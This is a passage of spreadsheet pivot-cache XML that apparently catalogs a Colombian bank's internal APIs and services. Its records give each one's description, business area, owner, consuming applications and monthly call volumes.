    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="APP-Sufi_AW1209001"/>
    <s v="AW1142001 _x000d__x000a_AW1081001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificar Estado Solicitud De Credito_BB12"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio les permite a los consumidores, enviar a Gestión Documental o a BIZAG  información relacionada con el estado de los documentos asociados a una solicitud de un crédito de consumo, el cual es conocido como una notificación."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW0499 _x000d__x000a_AW1176 _x000d__x000a_AW0856 _x000d__x000a_Carvajal"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-01-10T11:58:04"/>
    <s v="Notification Generate Report"/>
    <n v="101"/>
    <s v="Notification To Generate Report"/>
    <n v="101"/>
    <x v="301"/>
    <s v="API que permite notificar que se debe generar y enviar a buzón seguro"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="NotificacionEnvioReportePrestamo/V1.0"/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="PortalLibranzas_AW0360007 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="11"/>
    <n v="8"/>
    <n v="43"/>
    <n v="73"/>
    <n v="56"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-04T17:33:06"/>
    <s v="Notifications"/>
    <n v="100"/>
    <s v="Notifications - Alert and Notifications Information"/>
    <n v="100"/>
    <x v="302"/>
    <s v="API que permite consultar la siguiente información de un cliente:  - Mecanismo por medio el cual un cliente Bancolombia esta enrolado a clave dinámica, el cual puede variar entre ODA y Softoken.  -  Datos de contacto que fueron proporcionados por un cliente Bancolombia y/o un cliente de Bancolombia a la mano, como lo son níºmero de celular y correo electrónico autorizados para recibir notificaciones."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaDatosAlertasyNotificaciones/V1.0"/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ Autorizador-Digitalizacion-Tarjetas_NU0103001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ HelpContacts_NU0106001 _x000d__x000a_ SecurityOTP_NU0209001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <n v="488622"/>
    <n v="553729"/>
    <n v="488258"/>
    <n v="532334"/>
    <n v="594858"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-04T17:33:06"/>
    <s v="Notifications"/>
    <n v="300"/>
    <s v="Notifications - Alert and Notifications Information"/>
    <n v="100"/>
    <x v="303"/>
    <s v="API que permite consultar la siguiente información de un cliente:  - Mecanismo por medio el cual un cliente Bancolombia esta enrolado a clave dinámica, el cual puede variar entre ODA y Softoken.  -  Datos de contacto que fueron proporcionados por un cliente Bancolombia y/o un cliente de Bancolombia a la mano, como lo son níºmero de celular y correo electrónico autorizados para recibir notificaciones."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaDatosAlertasyNotificaciones/V1.0"/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-04T17:33:06"/>
    <s v="Notifications"/>
    <n v="100"/>
    <s v="Notifications - Alert and Notifications Subscription"/>
    <n v="100"/>
    <x v="304"/>
    <s v="API que permite realizar la inscripción de un cliente al sistema de alertas y notificaciones, al momento de la aperturación de un producto en Bancolombia. El cliente podrá inscribirse entregando níºmero de celular, correo electrónico o ambos datos."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionAlertasyNotificaciones/V1.0"/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ Autorizador-Digitalizacion-Tarjetas_NU0103001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ HelpContacts_NU0106001 _x000d__x000a_ SecurityOTP_NU0209001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <n v="864184"/>
    <n v="810462"/>
    <n v="758411"/>
    <n v="719610"/>
    <n v="800650"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-04T17:33:06"/>
    <s v="Notifications"/>
    <n v="300"/>
    <s v="Notifications - Alert and Notifications Subscription"/>
    <n v="100"/>
    <x v="300"/>
    <s v="API que permite realizar la inscripción de un cliente al sistema de alertas y notificaciones, al momento de la aperturación de un producto en Bancolombia. El cliente podrá inscribirse entregando níºmero de celular, correo electrónico o ambos datos."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionAlertasyNotificaciones/V1.0"/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-04T17:33:06"/>
    <s v="Notifications"/>
    <n v="100"/>
    <s v="Notifications - Send Alerts And Notifications"/>
    <n v="100"/>
    <x v="300"/>
    <s v="La presente API permite obtener la información para crear la estructura de un mensaje de alertas y notificaciones que deba enviarse a un cliente al momento de realizar una transacción. Estas transacciones se encuentran definidas en la sucursal virtual personas y existen también otro tipo de alertas que son obligatorias así­ el cliente no las haya configurado. Esta API consumirá el servicio EnvioAlertasyNotificaciones, que a su vez invoca la aplicación de alertas y notificaciones almacenada en el módulo PCC en el Iseries."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="EnvioAlertasYNotificaciones/V1.0"/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ Autorizador-Digitalizacion-Tarjetas_NU0103001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ HelpContacts_NU0106001 _x000d__x000a_ SecurityOTP_NU0209001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-04T17:33:06"/>
    <s v="Notifications"/>
    <n v="300"/>
    <s v="Notifications - Send Alerts And Notifications"/>
    <n v="100"/>
    <x v="300"/>
    <s v="La presente API permite obtener la información para crear la estructura de un mensaje de alertas y notificaciones que deba enviarse a un cliente al momento de realizar una transacción. Estas transacciones se encuentran definidas en la sucursal virtual personas y existen también otro tipo de alertas que son obligatorias así­ el cliente no las haya configurado. Esta API consumirá el servicio EnvioAlertasyNotificaciones, que a su vez invoca la aplicación de alertas y notificaciones almacenada en el módulo PCC en el Iseries."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="EnvioAlertasYNotificaciones/V1.0"/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Novedades Tarjetas Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite realizar diferentes tipos de novedades sobre el producto Tarjetas Crédito, los cuales se listan a continuación.  Crear tarjeta de crédito por uso inmediato "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Novedades Tarjetas Debito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite realizar diferentes tipos de novedades sobre el producto Tarjetas Débito, los cuales se listan a continuación.  Asociar tarjeta pre expedida  Crear tarjeta personalizada (pendiente)   Bloquear tarjeta (pendiente)   Desbloquear tarjeta "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-01-16T16:03:40"/>
    <s v="Security"/>
    <n v="111"/>
    <s v="OAuth - Provider from OTP"/>
    <n v="102"/>
    <x v="305"/>
    <s v="No tiene Descipcion"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <m/>
    <s v="CHATBOT _x000d__x000a_ Vinculación Digital _x000d__x000a_ Dummy _x000d__x000a_ Remitly APP1_RTY _x000d__x000a_ BC Portal de Contenido_AW1218001 _x000d__x000a_ TransferWise_TNW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-01-16T16:03:40"/>
    <s v="Security"/>
    <n v="111"/>
    <s v="OAuth - Provider from OTP Pymes"/>
    <n v="100"/>
    <x v="306"/>
    <s v="Proveedor de OAuth2 para autenticación con One Time Password (OTP) para Pymes"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <x v="8"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <m/>
    <s v="CHATBOT _x000d__x000a_ Vinculación Digital _x000d__x000a_ Dummy _x000d__x000a_ Remitly APP1_RTY _x000d__x000a_ BC Portal de Contenido_AW1218001 _x000d__x000a_ TransferWise_TNW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Obligaciones Hipotecario"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio expone una capacidad que permite realizar consultas detalladas para obligaciones hipotecarias."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <x v="21"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <m/>
    <s v="AW1294001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-04T11:44:12"/>
    <s v="Obligations"/>
    <n v="100"/>
    <s v="Obligations - Maintenance"/>
    <n v="100"/>
    <x v="307"/>
    <s v="La API expone una capacidad que permite rediferir un préstamo en el aplicativo core."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="MantenimientoObligacionesCartera/V1.0"/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Oferta Comercial Tarjetas Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Oferta Comercial Tarjetas Crédito permite a los consumidores calcular una oferta de tarjetas de crédito para un cliente (inicialmente estará disponible sólo para personas, pero la idea es que sirva posteriormente también para PYME).  Para calcular dicha oferta, el servicio funcionará como un orquestador para recuperar información necesaria, tal como: el segmento y sub segmento del cliente, relación cliente-banco, lista de tarjetas que tiene actualmente el cliente, validación para saber si el cliente se encuentra bajo un convenio de nómina.  Después de recopilar la información necesaria, esta información viaja a Medios de Pago quien realiza el cálculo de la oferta, y retorna una lista de tarjetas que se pueden ofrecer al cliente. "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="AW1285001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Oferta Cuentas Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Oferta Cuentas Depósitos permite consultar la información de la oferta que ofrece el producto de depósitos como por ejemplo los planes actuales para cuentas de ahorro y corriente. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0170001 _x000d__x000a_AW0000852"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-24T20:00:26"/>
    <s v="Offer"/>
    <n v="105"/>
    <s v="Offer - Offers"/>
    <n v="115"/>
    <x v="308"/>
    <s v="El producto Api de Ofertas permite consultar y listar los detalles de toda la información de las ofertas del core no financiero generados para los clientes Bancolombia. Permitiéndole a los consumidores consultar información que puede mostrarse en los distintos portales del banco, favoreciendo a clientes ya que los acerca a ofertas de productos que cumplen su perfil y ayudando a los productores a encontrar nuevas vitrinas de exposición de sus productos."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="CGC_NU0014001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001"/>
    <n v="566667"/>
    <n v="392688"/>
    <n v="615224"/>
    <n v="536617"/>
    <n v="483216"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-28T20:50:02"/>
    <s v="Operation Leasing"/>
    <n v="101"/>
    <s v="Operation Leasing - Information"/>
    <n v="101"/>
    <x v="309"/>
    <s v="La API Operation Leasing - Information permitirá a los consumidores realizar la consulta de una o varias obligaciones de Leasing (Financiero, Arrendamiento Operativo u otro) y obtener la información correspondiente al producto, estado y condiciones generales asociados a la operación."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Leasing"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ ModuloSVELeasing_AW0360006"/>
    <n v="17102"/>
    <n v="12956"/>
    <n v="11486"/>
    <n v="12777"/>
    <n v="14614"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pagar Credito Hipotecario"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permitir Pagar los Créditos Hipotecarios tanto para Personas Naturales (Individuales) como de Constructor, por medio de varios canales como son la Sucursal Virtual Personas (SVP) para créditos individual y Canales Físicos (Golf) para créditos Constructor"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <x v="21"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <s v="FINACLE 10.6_CREDITO HIPOTECARIO_AW1010001"/>
    <s v="SCI _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_AW01010 _x000d__x000a_AUD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pagar Tarjeta Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Realizar pagos de tarjeta de crédito propia y no propia para filiales del exterior (sólo para las filiales Panamá/Cayman), los pagos que se hacen por la sucursal virtual de las tarjetas de crédito del Banco de un cliente o los pagos que este hace de las tarjetas de un tercero."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Paginacion Fondos Fiduciarios"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este componente permite recorrer la estructura de los datos de los servicios de ConsultaInformacionFondosFiduciarios y ConsultaSaldosFondosFiduciarios, con el propósito de controlar las paginaciones y entregar las consultas solicitadas por el consumidor."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AW1187001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pago Con Transferencia"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Pago Con Transferencia, permite realizar una trasferencia entre cuentas bancolombia, con cobro de comision y su repectivo iva."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="Modulo de Administración de Tarjetas (MAT)_Tarjeta débito_ISMAT0001"/>
    <s v="BDT _x000d__x000a_AW1165 _x000d__x000a_APICONNECT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pago Credito Hipotecario"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Servicio que permite pagar los créditos hipotecarios tanto para personas naturales (individuales) como de constructor, por medio de varios canales como son la Sucursal Virtual Personas (SVP) para créditos individual y Canales Físicos: Golf (SCI, SAI) para créditos constructor, inicialmente, dichas consultas traerán la información desde FINACLE."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <x v="21"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <m/>
    <s v="SVE _x000d__x000a_NU0004001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0166001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pago De Facturas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Registrar el pago de una factura en el sistema de recaudos, incluyendo consulta del convenio del recaudador, validaciones de referencia y consulta del monto de una factura, sin importar donde se encuentra la información del valor (base de datos interna o externa)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="SAI _x000d__x000a_PAC _x000d__x000a_SCI _x000d__x000a_CNB _x000d__x000a_ALM _x000d__x000a_SVP _x000d__x000a_ALL _x000d__x000a_GDE _x000d__x000a_APP _x000d__x000a_PSE _x000d__x000a_SVE _x000d__x000a_ATM _x000d__x000a_AUD _x000d__x000a_FAC _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pago Factura"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio que permite pagar facturas inscritas debitando el dinero de la cuenta, realiza la afectación en tiempo real del saldo del cliente. Adicionalmente permite actualizar el valor a pagar de la factura si esta no tiene validación de base de datos._x005f_x000D_ Verifica la pertenencia de la cuenta, adicionalmente también permite validar y actualizar de ser necesario la personalización de topes, límites de pagos a terceros, límites de transferencias."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pago Prestamos"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio permite realizar el pagos de créditos comerciales, enviando al TEF3 de la transacción 001, la cuenta, el tipo de cuenta y el valor del préstamo de cliente para aplicar su pago, retornando el número de pagaré."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="STI - Sistema Transaccional de Integración_Sistema Transaccional de Integración_ISSTI0002"/>
    <s v="AW1170 _x000d__x000a_AW0955 _x000d__x000a_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pago Prestamos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Transacción encargada de realizar pagos de Préstamos, está en la capacidad de realizar pagos totales, parciales o cuota. La transacción realiza el débito a la cuenta origen y realiza el pago del préstamo, en caso de algún fallo en la misma, realiza el reverso del débito, la transacción verifica que la cuenta origen para realizar el débito."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pago Tarjeta Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Pago Tarjeta Crédito tiene como objetivo permitir el pago (pago mínimo, pago total y otro valor) de tarjetas de crédito propias y no propias en dólares y pesos."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-11-10T16:28:57"/>
    <s v="Party Authentication"/>
    <n v="100"/>
    <s v="Party Authentication - Password Management"/>
    <n v="100"/>
    <x v="310"/>
    <s v="Permite la gestión, administración y consultas que se puedan realizar sobre la clave Banco o primera clave del cliente. "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionClaveCliente/V1.0"/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="10360"/>
    <n v="19388"/>
    <n v="35277"/>
    <n v="27024"/>
    <n v="25480"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-28T18:14:52"/>
    <s v="Payment Execution"/>
    <n v="101"/>
    <s v="Payment Execution - Payments"/>
    <n v="101"/>
    <x v="311"/>
    <s v="La API Payment Execution - Payments tiene el objetivo de realizar la consulta general y detallada del histórico de lotes de pagos, que ha realizado una empresa afiliada a sus beneficiarios (proveedor o empleado)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="EDPYME_AW1170 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Horus_AW1258011"/>
    <n v="32658"/>
    <n v="31144"/>
    <n v="28657"/>
    <n v="30336"/>
    <n v="32350"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-26T18:12:26"/>
    <s v="Consumer Loan Sufi"/>
    <n v="100"/>
    <s v="Payment Information"/>
    <n v="100"/>
    <x v="312"/>
    <s v="El API es la interfaz de un servicio de composición entre los servicios de datos del cliente y de la consulta básica de obligaciones, que permite obtener los datos necesarios para que un cliente de Sufi pueda consultar los datos de sus próximos pagos a realizar desde una lí­nea telefónica bajo la tecnologí­a de respuesta de voz interactiva (IVR), este servicio de tarea se hace bajo el contexto del proveedor del Konecta."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="11447"/>
    <n v="9866"/>
    <n v="7230"/>
    <n v="13518"/>
    <n v="13750"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
